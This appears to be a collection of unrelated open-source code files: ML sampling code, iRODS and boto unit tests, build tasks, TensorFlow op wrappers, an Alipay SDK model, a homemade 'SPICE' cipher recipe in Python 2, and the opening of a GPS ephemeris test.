sorted_idx_to_remove[..., 0] = 0
# Set logits to large negative value to avoid sampling them. Iterate over
# the batch of examples.
for t in range(current_logits.size()[0]):
idx_to_remove = sorted_idx[t][sorted_idx_to_remove[t]]
current_logits[t][idx_to_remove] = -1e12
# Set logits for last predicted token to a large negative value to
# avoid repetition.
current_logits[t][last_predictions[t]] = -1e12
# Sample from the filtered distribution.
# shape: (batch_size, num_classes)
current_probs = F.softmax(current_logits, dim=-1)
# shape: (batch_size, )
current_predictions = torch.multinomial(current_probs, 1)
current_predictions = current_predictions.view(batch_size)
# Set current predicted tokens to be end-of-sentence for instances where
# last prediction was also end-of-sentence token.
current_predictions[last_predictions == self._eos_index] = self._eos_index
predictions.append(current_predictions)
# Remove start-of-sentence token from predictions, and collect them together.
# shape: (batch_size, max_steps) .. or could be less than max_steps.
all_predictions = torch.stack(predictions[1:]).permute(1, 0)
# We don't return any logprobs of generated sequence with nucleus sampling,
# unlike `AutoregressiveBeamSearch`.
return all_predictions, None
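# ------------------------------------------------------------------------------
# Usage sketch (not part of the original module): exercise the sampler with a
# dummy `step` callable returning random logits. The vocabulary size (10), EOS
# index (0) and start-token index (1) below are illustrative assumptions, not
# values defined by virtex.
if __name__ == "__main__":
    vocab_size, eos_index, start_index = 10, 0, 1
    def dummy_step(partial_captions: torch.Tensor) -> torch.Tensor:
        # Random logits for the next token, shape: (batch_size, vocab_size).
        return torch.randn(partial_captions.size(0), vocab_size)
    sampler = AutoRegressiveNucleusSampling(eos_index=eos_index, max_steps=5)
    start = torch.full((2,), start_index, dtype=torch.long)
    predictions, _ = sampler.search(start, dummy_step)
    print(predictions.shape)  # (2, T) with T <= max_steps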
|
scripts/irods/test/test_irule.py | JustinKyleJames/irods | 333 | 12688045 | from __future__ import print_function
import sys
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
from .. import lib
from .. import paths
from .. import test
from .resource_suite import ResourceBase
from ..configuration import IrodsConfig
class Test_Irule(ResourceBase, unittest.TestCase):
plugin_name = IrodsConfig().default_rule_engine_plugin
class_name = 'Test_Irule'
def setUp(self):
super(Test_Irule, self).setUp()
def tearDown(self):
super(Test_Irule, self).tearDown()
@unittest.skipIf(test.settings.TOPOLOGY_FROM_RESOURCE_SERVER or plugin_name=='irods_rule_engine_plugin-python',
'Skip for topology testing from resource server: reads server log')
@unittest.skipUnless(plugin_name == 'irods_rule_engine_plugin-irods_rule_language',
'tests cache update - only applicable for irods_rule_language REP')
def test_irule_printHello_in_serverLog_4189(self):
svr_log_path = paths.server_log_path()
initial_log_size = lib.get_file_size_by_path( svr_log_path )
_, _ ,rc = self.admin.run_icommand(['irule', 'printHello', 'hi', 'null'])
# With the above invalid parameter ("hi"), irule should return an error code to OS...
self.assertNotEqual (rc, 0)
# and shouldn't run the requested operation: i.e., writing to the log.
lib.delayAssert(
lambda: lib.log_message_occurrences_equals_count(
msg='\nHello',
count=0,
start_index=initial_log_size))
@unittest.skipUnless(plugin_name == 'irods_rule_engine_plugin-irods_rule_language',
'tests cache update - only applicable for irods_rule_language REP')
def test_irule_printVariables_on_stdout_4189(self):
stdout, stderr, rc = self.admin.run_icommand(['irule', 'writeLine("stdout","[*a][*b]")', '*a=1%*b=2', 'ruleExecOut'])
self.assertEqual (rc, 0)
self.assertIn ("[1][2]", stdout)
stdout, stderr, rc = self.admin.run_icommand(['irule', 'writeLine("stdout","[*a]")', '*a=1%badInput', 'ruleExecOut'])
self.assertNotIn( "[1]", stdout )
self.assertIn( "badInput format error", stderr )
self.assertNotEqual( rc, 0 )
|
test/utils/run.py | dburkhardt/SingleCellOpenProblems | 134 | 12688047 | from . import streams
import logging
import subprocess
import sys
import time
log = logging.getLogger("openproblems")
def format_error_timeout(process, timeout, stream):
"""Format subprocess output on timeout."""
return "{}\nTimed out after {} s\n\n{}".format(
" ".join(process.args),
timeout,
streams.NonBlockingStreamReader(stream).read().decode("utf-8"),
)
def _format_error(process, stream):
"""Format subprocess output."""
return "{}\nReturn code {}\n\n{}".format(
" ".join(process.args), process.returncode, stream.decode("utf-8")
)
def format_error_stderr(process):
"""Format subprocess output from stderr."""
return _format_error(process, process.stderr)
def format_error_stdout(process):
"""Format subprocess output from stdout."""
return _format_error(process, process.stdout)
def git_file_age(filename):
"""Get the age of a file's last git commit."""
git_age = (
run(
["git", "log", "-1", '--format="%ad"', "--date=unix", "--", filename],
return_stdout=True,
)
.strip()
.replace('"', "")
)
if git_age == "":
return 0
else:
return int(git_age)
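# Illustrative example (not part of the original module): git_file_age("README.md")
# returns the unix timestamp (in seconds) of the file's last commit, or 0 if the
# file has no commit history.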
def _run_failed(process, error_raises, format_error):
raise error_raises(format_error(process))
def run(
command,
shell=False,
print_stdout=False,
return_stdout=False,
return_code=False,
error_raises=AssertionError,
format_error=None,
timeout=3600,
):
"""Run subprocess.
Parameters
----------
command : list of str
shell : bool
Run command in a new shell
print_stdout : bool
Print subprocess stdout to sys.stdout
return_stdout : bool
Return subprocess stdout
return_code : bool
Return subprocess exit code
error_raises : Exception
Which exception to raise on failure
format_error : callable
Function to call to generate error message. If None, chooses from
`format_error_stderr` and `format_error_stdout` automatically.
"""
if return_stdout and print_stdout:
raise NotImplementedError
elif return_stdout:
stderr = subprocess.PIPE
if format_error is None:
format_error = format_error_stderr
else:
stderr = subprocess.STDOUT
if format_error is None:
format_error = format_error_stdout
log.debug("Running subprocess: {}".format(command))
p = subprocess.Popen(command, shell=shell, stdout=subprocess.PIPE, stderr=stderr)
if timeout is not None:
runtime = 0
        while p.poll() is None:
time.sleep(1)
runtime += 1
if runtime > timeout:
raise RuntimeError(
format_error_timeout(
p, timeout, p.stderr if stderr is subprocess.PIPE else p.stdout
)
)
log.debug("Awaiting subprocess completion")
if print_stdout:
while True:
output = p.stdout.readline().decode("utf-8")
if output == "" and p.poll() is not None:
break
if output:
print(output.strip())
sys.stdout.flush()
else:
p.wait()
log.debug("Subprocess complete")
p.stdout, p.stderr = p.communicate()
output = []
if return_stdout:
output.append(p.stdout.decode("utf-8"))
if return_code:
output.append(p.returncode)
if not return_code and not p.returncode == 0:
_run_failed(p, error_raises, format_error)
if output:
return output[0] if len(output) == 1 else tuple(output)
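# ------------------------------------------------------------------------------
# Usage sketch (not part of the original module; the command is illustrative):
#
#     out, code = run(["echo", "hello"], return_stdout=True, return_code=True)
#     assert code == 0 and out.strip() == "hello"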
|
tasks.py | vtemian/django-registration | 925 | 12688064 | <reponame>vtemian/django-registration<gh_stars>100-1000
from invoke import run
from invoke import task
@task
def clean(all=False):
if all:
flag = "--all"
else:
flag = ""
run("python setup.py clean {}".format(flag))
@task
def build(docs=False):
run("python setup.py build")
if docs:
run("sphinx-build docs docs/_build")
@task
def test():
run("python setup.py test")
@task
def lint():
run("rst2html.py README.rst > /dev/null")
run("flake8 registration")
run("isort --recursive --check-only registration")
|
src/custom_ops/custom_ops_factory.py | xiaoyuliu/AttentionalPoolingAction | 270 | 12688089 | import os
import json
from collections import OrderedDict
import numpy as np
import tensorflow as tf
cur_path = os.path.realpath(__file__)
ROOT_PATH = os.path.dirname(cur_path)
# add any new ops under the following
pose_to_heatmap_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'pose_to_heatmap.so')).pose_to_heatmap
zero_out_channels_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'zero_out_channels.so')).zero_out_channels
render_pose_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'render_pose.so')).render_pose
render_objects_fn = tf.load_op_library(
os.path.join(ROOT_PATH, 'render_objects.so')).render_objects
def pose_to_heatmap(*args, **kwargs):
with tf.variable_scope('pose_to_heatmap_pyWrapper'):
pose_img, pose_valid = pose_to_heatmap_fn(*args, **kwargs)
out_channels = kwargs['out_channels']
pose_img.set_shape((None, None, out_channels))
pose_valid.set_shape((out_channels,))
pose_img *= 255.0
pose_img = tf.cast(pose_img, tf.uint8)
return pose_img, pose_valid
def zero_out_channels(*args, **kwargs):
with tf.variable_scope('zero_out_channels_pyWrapper'):
return zero_out_channels_fn(*args, **kwargs)
def render_pose(*args, **kwargs):
with tf.variable_scope('render_pose_pyWrapper'):
out_channels = 3
if kwargs['out_type'] == 'rgb':
kwargs['out_type'] = 1
out_channels = 3
elif kwargs['out_type'] == 'split-channel':
kwargs['out_type'] = 2
out_channels = 18 # number of limbs
img = render_pose_fn(*args, **kwargs)
img *= 255.0
img = tf.cast(img, tf.uint8)
img.set_shape((None, None, out_channels))
return img
# from render_pose.cc
mpii_to_coco = OrderedDict([
(9, 0),
(8, 1),
(12, 2),
(11, 3),
(10, 4),
(13, 5),
(14, 6),
(15, 7),
(2, 8),
(1, 9),
(0, 10),
(3, 11),
(4, 12),
(5, 13),
])
def read_json_pose_fn(fpath):
try:
with open(fpath, 'r') as fin:
data = json.load(fin)
except:
print('Unable to open file {}'.format(fpath))
return -np.ones((16*3,)).astype('int64')
res = []
for body in data['bodies']:
mpii_joints = -np.ones((16, 3))
joints = np.array(body['joints'])
joints = np.reshape(joints, (-1, 3))
joints[joints[..., :] <= 0] = -1
mpii_joints[np.array(mpii_to_coco.keys()), :] = \
joints[np.array(mpii_to_coco.values()), :]
res += mpii_joints.reshape((-1,)).tolist()
res = np.array(res).astype('int64')
return res
def read_json_pose(*args):
return tf.py_func(read_json_pose_fn, args, tf.int64)
def render_objects(*args, **kwargs):
with tf.variable_scope('render_objects_pyWrapper'):
img = render_objects_fn(*args, **kwargs)
img *= 255.0
img = tf.cast(img, tf.uint8)
img.set_shape((None, None, kwargs['out_channels']))
return img
def extract_glimpse(image, pose_label, orig_im_ht, orig_im_wd,
out_side, pad_ratio, parts_keep):
# pose label is a [3x16xn,] vector
# for now just take the first pose and crop out the human
with tf.name_scope('ExtractGlimpse'):
pose_label = pose_label[:16*3]
pose_label = tf.reshape(pose_label, [16, 3])
if len(parts_keep) > 0:
pose_label = tf.gather(pose_label, parts_keep)
if len(parts_keep) == 1:
# now only one point, but need at least two to make a crop region
delta = tf.to_int64(
[tf.to_float(tf.shape(image)[-2]) * 0.1,
tf.to_float(tf.shape(image)[-3]) * 0.1, 0])
pose_label = tf.stack([
pose_label[0] - delta, pose_label[0] + delta])
pose_label_x = tf.to_float(pose_label[:, 0]) * \
tf.to_float(tf.shape(image)[-2]) / tf.to_float(orig_im_wd)
pose_label_y = tf.to_float(pose_label[:, 1]) * \
tf.to_float(tf.shape(image)[-3]) / tf.to_float(orig_im_ht)
pose_label = tf.stack([pose_label_y, pose_label_x])
mx_pts = tf.to_int32(tf.reduce_max(pose_label, axis=1))
mn_pts = tf.to_int32(tf.reduce_min(
tf.where(tf.greater_equal(pose_label, 0), pose_label,
tf.ones(pose_label.get_shape()) * 999999), axis=1))
delta_0 = tf.to_int32(tf.to_float((mx_pts[0] - mn_pts[0])) * pad_ratio)
delta_1 = tf.to_int32(tf.to_float((mx_pts[1] - mn_pts[1])) * pad_ratio)
mx_pts = mx_pts + [delta_0, delta_1]
mn_pts = mn_pts - [delta_0, delta_1]
offset_ht = tf.maximum(mn_pts[0], 0)
offset_wd = tf.maximum(mn_pts[1], 0)
target_ht = tf.minimum(mx_pts[0]-offset_ht, tf.shape(image)[-3]-offset_ht-1)
target_wd = tf.minimum(mx_pts[1]-offset_wd, tf.shape(image)[-2]-offset_wd-1)
# image = tf.Print(image, [offset_ht, offset_wd, target_ht, target_wd,
# tf.shape(image)], "stuff:")
image = tf.cond(tf.logical_and(
tf.greater(mx_pts[1], mn_pts[1]),
tf.greater(mx_pts[0], mn_pts[0])),
lambda: tf.image.crop_to_bounding_box(
image, offset_ht, offset_wd, target_ht, target_wd),
lambda: image)
if out_side > 0:
image = tf.image.resize_images(
image, [out_side, out_side])
return image
def read_sparse_label_fn(sparse_label, nclasses):
"""sparse_label is a string and return a 1D vector with the dense label
"""
res = np.zeros((nclasses,), dtype='int32')
res[np.array([int(el.split(':')[0]) for el in sparse_label.split(',')])] = \
np.array([int(el.split(':')[1]) for el in sparse_label.split(',')])
res[res < 0] = 0 # get rid of -1 label for now
return res
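# Illustrative example (not in the original source): read_sparse_label_fn('3:1,7:2', 10)
# returns a length-10 int32 vector with res[3] == 1, res[7] == 2 and zeros elsewhere.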
def read_sparse_label(*args):
return tf.py_func(read_sparse_label_fn, args, tf.int32)
|
graphene_sqlalchemy/resolvers.py | adrianschneider94/graphene-sqlalchemy | 947 | 12688122 | <reponame>adrianschneider94/graphene-sqlalchemy
from graphene.utils.get_unbound_function import get_unbound_function
def get_custom_resolver(obj_type, orm_field_name):
"""
Since `graphene` will call `resolve_<field_name>` on a field only if it
does not have a `resolver`, we need to re-implement that logic here so
users are able to override the default resolvers that we provide.
"""
resolver = getattr(obj_type, 'resolve_{}'.format(orm_field_name), None)
if resolver:
return get_unbound_function(resolver)
return None
def get_attr_resolver(obj_type, model_attr):
"""
In order to support field renaming via `ORMField.model_attr`,
we need to define resolver functions for each field.
:param SQLAlchemyObjectType obj_type:
:param str model_attr: the name of the SQLAlchemy attribute
:rtype: Callable
"""
return lambda root, _info: getattr(root, model_attr, None)
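# ------------------------------------------------------------------------------
# Illustrative sketch (not part of the library): how the two helpers are meant to
# combine when wiring a field. `UserType` and `email_address` are hypothetical
# names, not objects defined by graphene_sqlalchemy.
#
#     resolver = (get_custom_resolver(UserType, 'email')
#                 or get_attr_resolver(UserType, 'email_address'))
#     value = resolver(user_instance, info)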
|
tests/clpy_tests/opencl_tests/headercvt_tests/test_headercvt_funcdecl.py | fixstars/clpy | 142 | 12688138 | import unittest
import headercvt_test_utils as util
class TestHeadercvtFuncDecl(unittest.TestCase):
def setUp(self):
util.check_existence_of_headercvt()
@util.with_temp_wd
def test_headercvt_funcdecl_accept_case(self, wd):
util.kick_headercvt_and_get_results(wd, """
void clSomeFunction(int, void *);
""")
self.assertTrue(util.compile_with(wd, "clSomeFunction(10, <void*>0)"))
@util.with_temp_wd
def test_headercvt_funcdecl_decline_case(self, wd):
results = util.kick_headercvt_and_get_results(wd, """
void SomeFunction(int, void *);
""")
self.assertTrue(not util.contains(
results["func_decl"], "SomeFunction"))
self.assertTrue(util.compile_with(wd, ""))
|
tests/unit/ec2/test_blockdevicemapping.py | mariocesar/boto | 5,079 | 12688170 | from tests.compat import unittest
from boto.ec2.connection import EC2Connection
from boto.ec2.blockdevicemapping import BlockDeviceType, BlockDeviceMapping
from tests.compat import OrderedDict
from tests.unit import AWSMockServiceTestCase
class BlockDeviceTypeTests(unittest.TestCase):
def setUp(self):
self.block_device_type = BlockDeviceType()
def check_that_attribute_has_been_set(self, name, value, attribute):
self.block_device_type.endElement(name, value, None)
self.assertEqual(getattr(self.block_device_type, attribute), value)
def test_endElement_sets_correct_attributes_with_values(self):
for arguments in [("volumeId", 1, "volume_id"),
("virtualName", "some name", "ephemeral_name"),
("snapshotId", 1, "snapshot_id"),
("volumeSize", 1, "size"),
("status", "some status", "status"),
("attachTime", 1, "attach_time"),
("somethingRandom", "somethingRandom", "somethingRandom")]:
self.check_that_attribute_has_been_set(arguments[0], arguments[1], arguments[2])
def test_endElement_with_name_NoDevice_value_true(self):
self.block_device_type.endElement("NoDevice", 'true', None)
self.assertEqual(self.block_device_type.no_device, True)
def test_endElement_with_name_NoDevice_value_other(self):
self.block_device_type.endElement("NoDevice", 'something else', None)
self.assertEqual(self.block_device_type.no_device, False)
def test_endElement_with_name_deleteOnTermination_value_true(self):
self.block_device_type.endElement("deleteOnTermination", "true", None)
self.assertEqual(self.block_device_type.delete_on_termination, True)
def test_endElement_with_name_deleteOnTermination_value_other(self):
self.block_device_type.endElement("deleteOnTermination", 'something else', None)
self.assertEqual(self.block_device_type.delete_on_termination, False)
def test_endElement_with_name_encrypted_value_true(self):
self.block_device_type.endElement("Encrypted", "true", None)
self.assertEqual(self.block_device_type.encrypted, True)
def test_endElement_with_name_Encrypted_value_other(self):
self.block_device_type.endElement("Encrypted", 'something else', None)
self.assertEqual(self.block_device_type.encrypted, False)
class BlockDeviceMappingTests(unittest.TestCase):
def setUp(self):
self.block_device_mapping = BlockDeviceMapping()
def block_device_type_eq(self, b1, b2):
if isinstance(b1, BlockDeviceType) and isinstance(b2, BlockDeviceType):
return all([b1.connection == b2.connection,
b1.ephemeral_name == b2.ephemeral_name,
b1.no_device == b2.no_device,
b1.volume_id == b2.volume_id,
b1.snapshot_id == b2.snapshot_id,
b1.status == b2.status,
b1.attach_time == b2.attach_time,
b1.delete_on_termination == b2.delete_on_termination,
b1.size == b2.size,
b1.encrypted == b2.encrypted])
def test_startElement_with_name_ebs_sets_and_returns_current_value(self):
retval = self.block_device_mapping.startElement("ebs", None, None)
assert self.block_device_type_eq(retval, BlockDeviceType(self.block_device_mapping))
def test_startElement_with_name_virtualName_sets_and_returns_current_value(self):
retval = self.block_device_mapping.startElement("virtualName", None, None)
assert self.block_device_type_eq(retval, BlockDeviceType(self.block_device_mapping))
def test_endElement_with_name_device_sets_current_name_dev_null(self):
self.block_device_mapping.endElement("device", "/dev/null", None)
self.assertEqual(self.block_device_mapping.current_name, "/dev/null")
def test_endElement_with_name_device_sets_current_name(self):
self.block_device_mapping.endElement("deviceName", "some device name", None)
self.assertEqual(self.block_device_mapping.current_name, "some device name")
def test_endElement_with_name_item_sets_current_name_key_to_current_value(self):
self.block_device_mapping.current_name = "some name"
self.block_device_mapping.current_value = "some value"
self.block_device_mapping.endElement("item", "some item", None)
self.assertEqual(self.block_device_mapping["some name"], "some value")
class TestLaunchConfiguration(AWSMockServiceTestCase):
connection_class = EC2Connection
def default_body(self):
# This is a dummy response
return b"""
<DescribeLaunchConfigurationsResponse>
</DescribeLaunchConfigurationsResponse>
"""
def test_run_instances_block_device_mapping(self):
# Same as the test in ``unit/ec2/autoscale/test_group.py:TestLaunchConfiguration``,
# but with modified request parameters (due to a mismatch between EC2 &
# Autoscaling).
self.set_http_response(status_code=200)
dev_sdf = BlockDeviceType(snapshot_id='snap-12345')
dev_sdg = BlockDeviceType(snapshot_id='snap-12346', delete_on_termination=True, encrypted=True)
class OrderedBlockDeviceMapping(OrderedDict, BlockDeviceMapping):
pass
bdm = OrderedBlockDeviceMapping()
bdm.update(OrderedDict((('/dev/sdf', dev_sdf), ('/dev/sdg', dev_sdg))))
response = self.service_connection.run_instances(
image_id='123456',
instance_type='m1.large',
security_groups=['group1', 'group2'],
block_device_map=bdm
)
self.assert_request_parameters({
'Action': 'RunInstances',
'BlockDeviceMapping.1.DeviceName': '/dev/sdf',
'BlockDeviceMapping.1.Ebs.DeleteOnTermination': 'false',
'BlockDeviceMapping.1.Ebs.SnapshotId': 'snap-12345',
'BlockDeviceMapping.2.DeviceName': '/dev/sdg',
'BlockDeviceMapping.2.Ebs.DeleteOnTermination': 'true',
'BlockDeviceMapping.2.Ebs.SnapshotId': 'snap-12346',
'BlockDeviceMapping.2.Ebs.Encrypted': 'true',
'ImageId': '123456',
'InstanceType': 'm1.large',
'MaxCount': 1,
'MinCount': 1,
'SecurityGroup.1': 'group1',
'SecurityGroup.2': 'group2',
}, ignore_params_values=[
'Version', 'AWSAccessKeyId', 'SignatureMethod', 'SignatureVersion',
'Timestamp'
])
if __name__ == "__main__":
unittest.main()
|
alipay/aop/api/domain/AlipaySecurityProdMygetQueryModel.py | antopen/alipay-sdk-python-all | 213 | 12688188 | <filename>alipay/aop/api/domain/AlipaySecurityProdMygetQueryModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.ExtendParams import ExtendParams
class AlipaySecurityProdMygetQueryModel(object):
def __init__(self):
self._extend_params = None
self._phone = None
@property
def extend_params(self):
return self._extend_params
@extend_params.setter
def extend_params(self, value):
if isinstance(value, ExtendParams):
self._extend_params = value
else:
self._extend_params = ExtendParams.from_alipay_dict(value)
@property
def phone(self):
return self._phone
@phone.setter
def phone(self, value):
self._phone = value
def to_alipay_dict(self):
params = dict()
if self.extend_params:
if hasattr(self.extend_params, 'to_alipay_dict'):
params['extend_params'] = self.extend_params.to_alipay_dict()
else:
params['extend_params'] = self.extend_params
if self.phone:
if hasattr(self.phone, 'to_alipay_dict'):
params['phone'] = self.phone.to_alipay_dict()
else:
params['phone'] = self.phone
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipaySecurityProdMygetQueryModel()
if 'extend_params' in d:
o.extend_params = d['extend_params']
if 'phone' in d:
o.phone = d['phone']
return o
|
recipes/Python/572159_SPICE/recipe-572159.py | tdiprima/code | 2,023 | 12688189 | '''Module that implements SPICE.
This module provides access to a standardized implementation
of SPICE (Stephen's Power-Inspired, Computerized Encryption).'''
################################################################################
__version__ = '$Revision: 0 $'
__date__ = 'April 19, 2008'
__author__ = 'Stephen "Zero" Chappell <<EMAIL>>'
__credits__ = '''\
<NAME>, for testing code that led to this module.
<NAME>, for contributing to the random module.
<NAME>, for adding support for two core generators.'''
################################################################################
import random as _random
import sys as _sys
################################################################################
def crypt_major():
'Create a new Major Key.'
return ''.join(map(chr, _crypt.sample(xrange(256), 256)))
def crypt_minor():
'Create a new Minor Key.'
sample = _crypt.sample(range(4) * 64, 256)
array = []
for index in xrange(64):
bits_12 = sample[index * 4] << 6
bits_34 = sample[index * 4 + 1] << 4
bits_56 = sample[index * 4 + 2] << 2
bits_78 = sample[index * 4 + 3]
array.append(bits_12 + bits_34 + bits_56 + bits_78)
return ''.join(map(chr, array))
################################################################################
def named_major(name):
'Create a named Major Key.'
_namer.seed(name)
return ''.join(map(chr, _namer.sample(xrange(256), 256)))
def named_minor(name):
'Create a named Minor Key.'
_namer.seed(name)
sample = _namer.sample(range(4) * 64, 256)
array = []
for index in xrange(64):
bits_12 = sample[index * 4] << 6
bits_34 = sample[index * 4 + 1] << 4
bits_56 = sample[index * 4 + 2] << 2
bits_78 = sample[index * 4 + 3]
array.append(bits_12 + bits_34 + bits_56 + bits_78)
return ''.join(map(chr, array))
################################################################################
def encode_string(string, major, minor):
'Return an encrypted string.'
assert isinstance(string, str)
_check_major(major)
_check_minor(minor)
map_1 = _encode_map_1(major)
map_2 = _encode_map_2(minor)
return _encode(string, map_1, map_2)
def decode_string(string, major, minor):
'Return a decrypted string.'
assert isinstance(string, str) and len(string) % 4 == 0
_check_major(major)
_check_minor(minor)
map_1 = _decode_map_1(minor)
map_2 = _decode_map_2(major)
return _decode(string, map_1, map_2)
################################################################################
def encode_file(source, destination, major, minor):
'Encrypt a file from source to destination.'
_check_major(major)
_check_minor(minor)
map_1 = _encode_map_1(major)
map_2 = _encode_map_2(minor)
string = source.read(2 ** 20 / 5)
while string:
destination.write(_encode(string, map_1, map_2))
string = source.read(2 ** 20 / 5)
def decode_file(source, destination, major, minor):
'Decrypt a file from source to destination.'
_check_major(major)
_check_minor(minor)
map_1 = _decode_map_1(minor)
map_2 = _decode_map_2(major)
string = source.read(2 ** 20 / 5 * 4)
while string:
tail_len = len(string) % 4
if tail_len == 0:
destination.write(_decode(string, map_1, map_2))
string = source.read(2 ** 20 / 5 * 4)
else:
destination.write(_decode(string[:-tail_len], map_1, map_2))
return string[-tail_len:]
return ''
################################################################################
class File_Crypt:
'File_Crypt(major, minor, name, mode) -> File_Crypt'
def __init__(self, major, minor, name, mode):
'Initialize the File_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
assert len(mode) == 1 and mode in 'raw'
self.__file = open(name, mode + 'b', 0)
self.tail = ''
def read(self, size=-1):
'Read and decrypt from file.'
string = self.__file.read(size * 4)
tail_len = len(string) % 4
if tail_len:
self.tail = string[-tail_len:]
return _decode(string[:-tail_len], self.__dm1, self.__dm2)
else:
return _decode(string, self.__dm1, self.__dm2)
def write(self, string):
'Encrypt and write to file.'
self.__file.write(_encode(string, self.__em1, self.__em2))
def seek(self, offset, whence=0):
'Seek to virtual positon in file.'
self.__file.seek(offset * 4, whence)
offset = self.__file.tell() / 4
self.__file.seek(offset * 4)
def tell(self):
'Return the virtual position in file.'
return self.__file.tell() / 4
def close(self):
'Close the File_Crypt object.'
self.__file.close()
################################################################################
class Socket_Crypt:
'Socket_Crypt(major, minor, socket) -> Socket_Crypt'
def __init__(self, major, minor, socket):
'Initialize the Socket_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
self.__major = major
self.__minor = minor
self.__socket = socket
self.__tail = ''
self.__tails = {}
def accept(self):
'Return a new Socket_Crypt and address.'
conn, address = self.__socket.accept()
return Socket_Crypt(self.__major, self.__minor, conn), address
def recv(self, size, flags=0):
'Receive and decrypt off socket.'
string = self.__tail + self.__socket.recv(size * 4, flags)
tail_len = len(string) % 4
if tail_len:
self.__tail = string[-tail_len:]
return _decode(string[:-tail_len], self.__dm1, self.__dm2)
else:
self.__tail = ''
return _decode(string, self.__dm1, self.__dm2)
def recvfrom(self, size, flags=0):
'Receive datagram and decrypt off socket.'
string, address = self.__socket.recvfrom(size * 4, flags)
string = self.__tails.get(address, '') + string
tail_len = len(string) % 4
if tail_len:
self.__tails[address] = string[-tail_len:]
string = _decode(string[:-tail_len], self.__dm1, self.__dm2)
return string, address
else:
if address in self.__tails:
del self.__tails[address]
string = _decode(string, self.__dm1, self.__dm2)
return string, address
def send(self, string, flags=0):
'Encrypt and send on socket.'
string = _encode(string, self.__em1, self.__em2)
sent = self.__socket.send(string, flags)
offset = sent % 4
if offset:
string = string[sent:][:4-offset]
sent += len(string)
while string:
string = string[self.__socket.send(string, flags):]
return sent / 4
def sendall(self, string, flags=0):
'Encrypt and send all on socket.'
string = _encode(string, self.__em1, self.__em2)
return self.__socket.sendall(string, flags)
def sendto(self, string, address, flags=0):
'Encrypt and send datagram on socket.'
string = _encode(string, self.__em1, self.__em2)
sent = self.__socket.sendto(string, flags, address)
offset = sent % 4
if offset:
string = string[sent:][:4-offset]
sent += len(string)
while string:
                string = string[self.__socket.sendto(string, flags, address):]
return sent / 4
def makefile(self, mode='r', bufsize=-1):
'Return a file-like object.'
return self
def read(self, size=-1):
'Read and decrypt from socket.'
if size < 0:
cache = ''
while True:
temp = self.recv(2 ** 10)
if temp:
cache += temp
else:
return cache
else:
return self.recv(size)
def readline(self, size=-1):
'Dummy attribute for cPickle.'
raise NotImplementedError
def write(self, string):
'Encrypt and write to socket.'
self.sendall(string)
################################################################################
class String_Crypt:
'String_Crypt(major, minor) -> String_Crypt'
def __init__(self, major, minor):
'Initialize the String_Crypt object.'
_check_major(major)
_check_minor(minor)
self.__em1 = _encode_map_1(major)
self.__em2 = _encode_map_2(minor)
self.__dm1 = _decode_map_1(minor)
self.__dm2 = _decode_map_2(major)
def encode(self, string):
'Return an encrypted string.'
assert isinstance(string, str)
return _encode(string, self.__em1, self.__em2)
def decode(self, string):
'Return a decrypted string.'
assert isinstance(string, str) and len(string) % 4 == 0
return _decode(string, self.__dm1, self.__dm2)
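# Illustrative example (not part of the original recipe): encoding and then
# decoding with the same Major/Minor key pair round-trips the plaintext.
#
#     major, minor = crypt_major(), crypt_minor()
#     sc = String_Crypt(major, minor)
#     assert sc.decode(sc.encode('secret')) == 'secret'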
################################################################################
_crypt = _random.SystemRandom()
_namer = _random.Random()
################################################################################
def _check_major(key):
'Private module function.'
assert isinstance(key, str) and len(key) == 256
for character in map(chr, xrange(256)):
assert character in key
def _check_minor(key):
'Private module function.'
assert isinstance(key, str) and len(key) == 64
indexs = []
for byte in map(ord, key):
for shift in xrange(6, -2, -2):
indexs.append((byte >> shift) & 3)
for index in xrange(4):
assert indexs.count(index) == 64
def _encode_map_1(major):
'Private module function.'
return map(ord, major)
def _encode_map_2(minor):
'Private module function.'
map_2 = [[], [], [], []]
array = []
for byte in map(ord, minor):
for shift in xrange(6, -2, -2):
array.append((byte >> shift) & 3)
for byte, index in enumerate(array):
map_2[index].append(chr(byte))
return map_2
def _decode_map_1(minor):
'Private module function.'
map_1 = []
for byte in map(ord, minor):
for shift in xrange(6, -2, -2):
map_1.append((byte >> shift) & 3)
return map_1
def _decode_map_2(major):
'Private module function.'
map_2 = [None] * 256
for byte, index in enumerate(map(ord, major)):
map_2[index] = chr(byte)
return map_2
def _encode(string, map_1, map_2):
'Private module function.'
cache = ''
for character in string:
byte = map_1[ord(character)]
for shift in xrange(6, -2, -2):
cache += map_2[(byte >> shift) & 3][_crypt.randrange(64)]
return cache
def _decode(string, map_1, map_2):
'Private module function.'
cache = ''
iterator = iter(string)
for byte in iterator:
bits_12 = map_1[ord(byte)] << 6
bits_34 = map_1[ord(iterator.next())] << 4
bits_56 = map_1[ord(iterator.next())] << 2
bits_78 = map_1[ord(iterator.next())]
cache += map_2[bits_12 + bits_34 + bits_56 + bits_78]
return cache
################################################################################
if __name__ == '__main__':
_sys.stdout.write('Content-Type: text/plain\n\n')
_sys.stdout.write(file(_sys.argv[0]).read())
|
laika_repo/tests/test_ephemerides.py | JoeOIVOV/ArnePilot | 116 | 12688245 | import numpy as np
import unittest
from laika.gps_time import GPSTime
from laika import AstroDog
gps_times_list = [[1950, 415621.0],
[1895, 455457.0],
[1885, 443787.0]]
svIds = ['G01', 'G31', 'R08']
gps_times = [GPSTime(*gps_time_list) for gps_time_list in gps_times_list]
class TestAstroDog(unittest.TestCase):
'''
def test_nav_vs_orbit_now(self):
dog_orbit = AstroDog(pull_orbit=True)
dog_nav = AstroDog(pull_orbit=False)
gps_time = GPSTime.from_datetime(datetime.utcnow()) - SECS_IN_DAY*2
for svId in svIds:
sat_info_nav = dog_nav.get_sat_info(svId, gps_time)
sat_info_orbit = dog_orbit.get_sat_info(svId, gps_time)
